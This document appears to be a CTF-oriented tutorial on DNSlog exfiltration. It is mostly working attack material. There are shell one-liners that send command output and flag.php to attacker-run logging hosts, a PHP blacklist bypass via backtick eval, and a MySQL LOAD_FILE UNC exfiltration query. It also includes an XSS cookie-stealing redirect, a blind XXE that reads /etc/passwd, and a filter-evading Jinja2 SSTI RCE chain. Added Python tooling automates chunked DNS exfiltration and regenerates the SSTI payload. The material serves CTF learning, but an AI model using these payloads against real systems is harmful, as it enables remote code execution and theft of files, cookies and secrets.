DNS exfiltration

DNSlog exfiltration techniques explained

I. Core principle

DNSlog exfiltration relies on the fact that DNS resolution is almost always allowed out of a network even when direct HTTP egress is blocked: the target only needs to be able to resolve names. The sensitive data is placed in the subdomain labels of a name under an attacker-controlled zone; resolving that name forces a query to the attacker's authoritative server, whose query log then contains the data. Only the name reaches the server, so the payload has to fit DNS constraints: hostname characters only, at most 63 characters per label and 253 characters for the whole name, and case cannot be relied on because DNS is case-insensitive.

II. Basic usage

# Basic command-execution example: the output of whoami becomes a subdomain label.
# The name is resolved before any ICMP is sent, so the query is logged even if ping itself is blocked.
ping -c 1 `whoami`.YoungKing.eyes.sh

III. Blind RCE (no output returned)

# Blind command execution: the output of ls is carried in the request to a logging server.
# With curl the data travels in the HTTP query string, which needs HTTP egress; the DNS lookup
# of the hostname is logged regardless, so if only DNS gets out the data must go into the hostname.
curl http://vbruus9t.requestrepo.com/?1=`ls`
/?cmd=curl http://YoungKing.eyes.sh/?1=`ls`

IV. Bypassing filter patterns

Blind examples (two challenge sources)

<?php  
error_reporting(0);
highlight_file(__FILE__);
$cmd=$_GET['cmd'];

// Blacklist: the command may not contain "flag" or "dnslog" (case-insensitive), so the
// logging domain itself must not contain "dnslog" and the string "flag" must not appear
// literally in the command.
if(!preg_match("/flag|dnslog/i",$cmd)){
shell_exec($cmd);   // output is discarded: no echo, hence the need for out-of-band exfiltration
}
?>
<?php  
error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
// Blacklist of common execution primitives; only the first 6 characters of F are evaluated
if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){
eval(substr($F,0,6));
}else{
die("6个字母都还不够呀?!");   // "6 characters and still not enough?!"
}
}

Exfiltrating file contents

# Newlines in the output cannot be carried in a URL or a hostname, so the output is usually base64-encoded.
# Note that base64 output is itself wrapped every 76 characters (GNU base64 -w0 disables this) and
# contains +, / and =, which are fine in a query string but not in a hostname label.
curl http://YoungKing.eyes.sh/?1=`ls .|base64`
curl http://vbruus9t.requestrepo.com/?1=`ls .|base64`

Burp Collaborator example (for the 6-character eval challenge above)

?F=`$F`;+curl -X POST -F xx=@flag.php http://5djwt01qp1saqhwosujdblpjcai16rug.oastify.com

Why this works: the `+` decodes to a space, so `substr($F,0,6)` is `` `$F`; `` followed by a space, and PHP evaluates a backtick (shell_exec) operator. PHP interpolates variables inside backticks, so the whole value of `$F` is handed to the shell. In the shell, `$F` is an unset variable and expands to nothing, leaving `; curl -X POST -F xx=@flag.php http://...`, which uploads flag.php to the Collaborator host. None of the blacklisted words appear in the payload, and both the DNS lookup and the HTTP POST show up in Collaborator.

V. Advanced scenarios

1. Blind command execution

# Nested command substitution: re-encode the output so it only contains hostname characters.
# tr maps + and / to the URL-safe - and _, but the = padding and the 76-column line breaks of
# base64 remain, and the result is usually longer than one 63-character label; in practice use
# base64 -w0, strip the =, and split the result into labels of at most 63 characters.
curl "http://$(uname -a|base64|tr +/ -_).YoungKing.eyes.sh"

# File content exfiltration (first 30 bytes). Hex avoids all of the above: 30 bytes give
# 60 characters, within the 63-character label limit, and the alphabet is case-insensitive.
curl "http://$(head -c30 /flag|xxd -p).YoungKing.eyes.sh"
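The payloads in sections II, IV and V.1 push raw or base64 output into a single label, which silently breaks once the data exceeds 63 characters, contains `+`, `/`, `=` or newlines, or arrives at the log out of order after resolver retries. The following is an added example (my code, not from the original post) that does the packing and the reassembly properly: hex encoding, a sequence label, the label and name limits, deduplication of retries and gap detection. The zone `YoungKing.eyes.sh` is the one used on the page; the session label `sa`, the log-line format, the secret and the resolver behaviour in `demo()` are constructed.

```python
"""Pack arbitrary bytes into DNS-safe query names and rebuild them from the
DNS log.  Added example, not code from the original post.  The session label,
the log-line format and the secret are constructed; the limits are RFC 1035."""
import binascii
import random
import re

MAX_LABEL = 63   # longest single label
MAX_NAME = 253   # longest full name in text form


def hex_per_query(zone: str, session: str) -> int:
    """Hex characters that fit in one name of the form
    <seq>.<session>.<label>...<label>.<zone>, rounded down to whole bytes."""
    fixed = 4 + 1 + len(session) + 1 + len(zone)        # "0000." + "sa." + zone
    labels = 0
    while fixed + (labels + 1) * (MAX_LABEL + 1) <= MAX_NAME:
        labels += 1
    if labels == 0:
        raise ValueError("zone too long to carry any data")
    per = labels * MAX_LABEL
    return per - per % 2


def encode_queries(data: bytes, zone: str, session: str = "sa") -> list:
    """Hex rather than base64: '+', '/' and '=' are not hostname characters and
    DNS is case-insensitive.  The 4-hex-digit sequence label lets the receiver
    reorder chunks and discard resolver retries."""
    hexdata = binascii.hexlify(data).decode()
    per = hex_per_query(zone, session)
    names = []
    for seq, start in enumerate(range(0, len(hexdata), per)):
        chunk = hexdata[start:start + per]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        names.append(f"{seq:04x}.{session}.{'.'.join(labels)}.{zone}")
    return names


def as_shell(names: list) -> str:
    """Victim-side one-liner: one lookup per name, output discarded."""
    return "; ".join(f"nslookup {n} >/dev/null 2>&1" for n in names)


def decode_log(lines, zone: str, session: str = "sa"):
    """Rebuild the data from the logging server's lines.  Returns the bytes of
    the contiguous prefix and the list of sequence numbers that never arrived."""
    pat = re.compile(r"\b([0-9a-f]{4})\." + re.escape(session)
                     + r"\.((?:[0-9a-f]{1,63}\.)+)" + re.escape(zone.lower()) + r"\b")
    chunks = {}
    for line in lines:
        m = pat.search(line.lower())            # 0x20 case randomisation is harmless
        if m:
            chunks.setdefault(int(m.group(1), 16), m.group(2).replace(".", ""))
    if not chunks:
        return b"", []
    expected = range(max(chunks) + 1)
    missing = [s for s in expected if s not in chunks]
    prefix = []
    for s in expected:
        if s not in chunks:
            break
        prefix.append(chunks[s])
    return binascii.unhexlify("".join(prefix)), missing


def demo():
    """Round trip through a constructed log: scrambled order, a retried query
    and one name upper-cased by the resolver."""
    secret = b"flag{dns-exfil-with-sequence-numbers}\n" * 3   # constructed
    zone = "YoungKing.eyes.sh"
    names = encode_queries(secret, zone)
    log = [f"2024-05-01 10:00:{i:02d} A {n} 203.0.113.7" for i, n in enumerate(names)]
    log.append(log[0])                     # resolver retry: same query twice
    log[1] = log[1].upper()                # case randomisation
    random.Random(1).shuffle(log)          # out-of-order arrival
    data, missing = decode_log(log, zone)
    return data == secret and not missing, names


if __name__ == "__main__":
    ok, names = demo()
    print("round trip ok:", ok)
    print(as_shell(names))
```

The receiver treats the first copy of a sequence number as authoritative and stops reassembly at the first gap rather than concatenating across it, because a missing chunk would otherwise shift every byte after it; the missing list tells you which queries to re-trigger.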

2. Blind SQL injection exfiltration

-- MySQL on Windows: LOAD_FILE() on a UNC path makes the server resolve the host part, so the
-- first 30 characters of the flag become a subdomain of the logging zone. Needs the FILE
-- privilege and an empty secure_file_priv. Only hostname characters survive the lookup, so
-- wrap the MID() in HEX() when the data may contain anything else.
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT MID(flag,1,30) FROM flag),'.mysql.YoungKing.eyes.sh\\test'));

3. XSS bypassing CSP

<!-- When CSP blocks fetch/XMLHttpRequest (connect-src): a top-level navigation is not covered by
     connect-src, and the browser resolves the new host before the request, so the lookup is logged.
     Caveat: raw cookie text contains '=', ';' and spaces, which are not hostname characters;
     hex-encode it and keep each label under 63 characters. The navigation is also visible to the user. -->
<script>location='http://'+document.cookie.substr(0,50)+'.xss.target.eyes.sh'</script>

4. Blind XXE

<!-- External DTD hosted by the attacker: the parser reads the file through PHP's php://filter
     wrapper (base64-encoded), embeds the result in the host part of a URL and tries to fetch it,
     so the DNS lookup reaches the log. %param; and %exfil; trigger the nested declaration;
     the inner % must be written as &#x25; so it is not expanded too early. -->
<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://%payload;.xxe.target.eyes.sh'>">
%param;
%exfil;
<!-- Caveat: base64 of /etc/passwd is far longer than a 63-character label or a 253-character name
     and contains '+', '/' and '='; a DNS-only channel needs a small file, and with HTTP egress
     the %payload; belongs in the query string instead of the hostname. -->

5. SSTI when `{{ }}` output is filtered

Jinja2 payload for a target where `{{`/print, quotes, digits and underscores are filtered, so everything happens inside `{% set %}` blocks. How the pieces are built: `a` is the string "pop", obtained by joining dict keys; integers are written as the length of a dict key (`dict(eee...=a)|join|count`); individual characters are popped out of `lipsum|string|list`, where `str(lipsum)` is `<function generate_lorem_ipsum at 0x...>`, so index 18 (`j`) is `_` and index 9 (`k`) is a space; `c`, `d` and `e` spell `__globals__`, `__getitem__` and `os`, giving the os module as `(lipsum|attr(c))|attr(d)(e)`; `g` is `/`, popped from position -8 of the module repr (`... /os.py'>`); `p` is the backtick and `q` the `.`, both taken from the repr of `lipsum.__globals__` (index 20 of `{'__name__': 'jinja2.utils', ...` is the dot, the backtick sits much further in, hence the very long key). `i` assembles ``curl `cat /flag`.YoungKing.eyes.sh``, the `if` runs it through `os.popen`, and the page renders `dnslogyyds` on success while the flag arrives in the DNS log. The indices are specific to the target's Python and Jinja2 build.

?name=
{%set a=dict(po=aa,p=aa)|join%}
{%set j=dict(eeeeeeeeeeeeeeeeee=a)|join|count%}
{%set k=dict(eeeeeeeee=a)|join|count%}
{%set l=dict(eeeeeeee=a)|join|count%}
{%set n=dict(eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee=a)|join|count%}
{%set m=dict(eeeeeeeeeeeeeeeeeeee=a)|join|count%}
{%set b=(lipsum|string|list)|attr(a)(j)%}
{%set c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}
{%set d=(b,b,dict(getit=cc,em=aa)|join,b,b)|join%}
{%set e=dict(o=cc,s=aa)|join%}{% set f=(lipsum|string|list)|attr(a)(k)%}
{%set g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-l)%}
{%set p=((lipsum|attr(c))|string|list)|attr(a)(n)%}
{%set q=((lipsum|attr(c))|string|list)|attr(a)(m)%}
{%set i=(dict(curl=aa)|join,f,p,dict(cat=a)|join,f,g,dict(flag=aa)|join,p,q,dict(YoungKing=a)|join,q,dict(eyes=a)|join,q,dict(sh=a)|join)|join%}
{%if ((lipsum|attr(c))|attr(d)(e)).popen(i)%}
dnslogyyds
{%endif%}
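The payload above hard-codes the positions 18, 9, -8, 20 and one very long key length, which hold only for the target's Jinja2 and Python install. The following is an added example (my code, not from the original post) that regenerates the index-dependent part of that chain from the repr strings of the objects it pops characters from. The three repr strings in `SOURCES` are constructed samples (the function address, the install path and the `__globals__` excerpt are made up); on a real target they have to be dumped first. The variables `a`, `b`, `c`, `d`, `e` and `i` follow the payload; `v`, `va`, ... are my own digit-free names.

```python
"""Regenerate the index-dependent part of the {% set %} payload above for a
given target.  Added example, not code from the original post.  The three repr
strings in SOURCES are constructed samples (function address, install path and
the __globals__ excerpt are made up): dump the real ones from the target first,
because every index below is computed from them."""
import re

# Jinja expression -> what that object looks like after |string.  The first
# source that contains a character wins.  c, d, e are the payload's own
# variables ("__globals__", "__getitem__", "os"), set in build_payload().
SOURCES = {
    "lipsum": "<function generate_lorem_ipsum at 0x7f3a0c2b1e40>",
    "((lipsum|attr(c))|attr(d)(e))": "<module 'os' from '/usr/lib/python3.10/os.py'>",
    "(lipsum|attr(c))": "{'__name__': 'jinja2.utils', '__doc__': 'sample with a ` in it'}",
}


def jinja_int(n: int) -> str:
    """An integer without digits: the length of an n-character dict key."""
    if n < 0:
        raise ValueError("write negative indices as -jinja_int(-n)")
    return f"dict({'e' * n}=a)|join|count" if n else "dict()|join|count"


def jinja_word(word: str) -> str:
    """A letters-only word without quotes: dict(word=a)|join yields the key."""
    if not re.fullmatch(r"[A-Za-z]+", word):
        raise ValueError(f"not a plain identifier: {word!r}")
    return f"dict({word}=a)|join"


def find_char(ch: str):
    """(jinja_expr, index) of the first known repr containing ch, else None."""
    for expr, text in SOURCES.items():
        idx = text.find(ch)
        if idx != -1:
            return expr, idx
    return None


def jinja_char(ch: str) -> str:
    """Pop ch out of the |string|list of the first repr that contains it
    (a holds "pop", as in the payload)."""
    hit = find_char(ch)
    if hit is None:
        raise ValueError(f"no known repr contains {ch!r}; add another source")
    expr, idx = hit
    return f"({expr}|string|list)|attr(a)({jinja_int(idx)})"


def build_payload(cmd: str) -> str:
    """Emit the {% set %} chain that runs cmd through os.popen without quotes,
    digits, underscores or {{ }}."""
    lines = [
        "{%set a=dict(po=aa,p=aa)|join%}",                      # "pop"
        "{%set b=" + jinja_char("_") + "%}",                    # "_"
        "{%set c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}",   # "__globals__"
        "{%set d=(b,b,dict(getit=cc,em=aa)|join,b,b)|join%}",   # "__getitem__"
        "{%set e=dict(o=cc,s=aa)|join%}",                       # "os"
    ]
    parts, names = [], {}
    for tok in re.findall(r"[A-Za-z]+|.", cmd, flags=re.S):
        if re.fullmatch(r"[A-Za-z]+", tok):
            parts.append(jinja_word(tok))
            continue
        if tok not in names:                                    # one variable per distinct character
            names[tok] = "v" + "a" * len(names)                 # digit-free variable names
            lines.append("{%set " + names[tok] + "=" + jinja_char(tok) + "%}")
        parts.append(names[tok])
    lines.append("{%set i=(" + ",".join(parts) + ")|join%}")
    lines.append("{%if ((lipsum|attr(c))|attr(d)(e)).popen(i)%}ok{%endif%}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(build_payload("curl `cat /flag`.YoungKing.eyes.sh"))
```

Each `|list` creates a fresh list, so popping the same index twice is safe; the only thing that changes between targets is the contents of `SOURCES`, which is why the real reprs must be obtained from the target (for example through whatever output channel is left, or from a local copy of the same Python and Jinja2 versions) before the chain is generated.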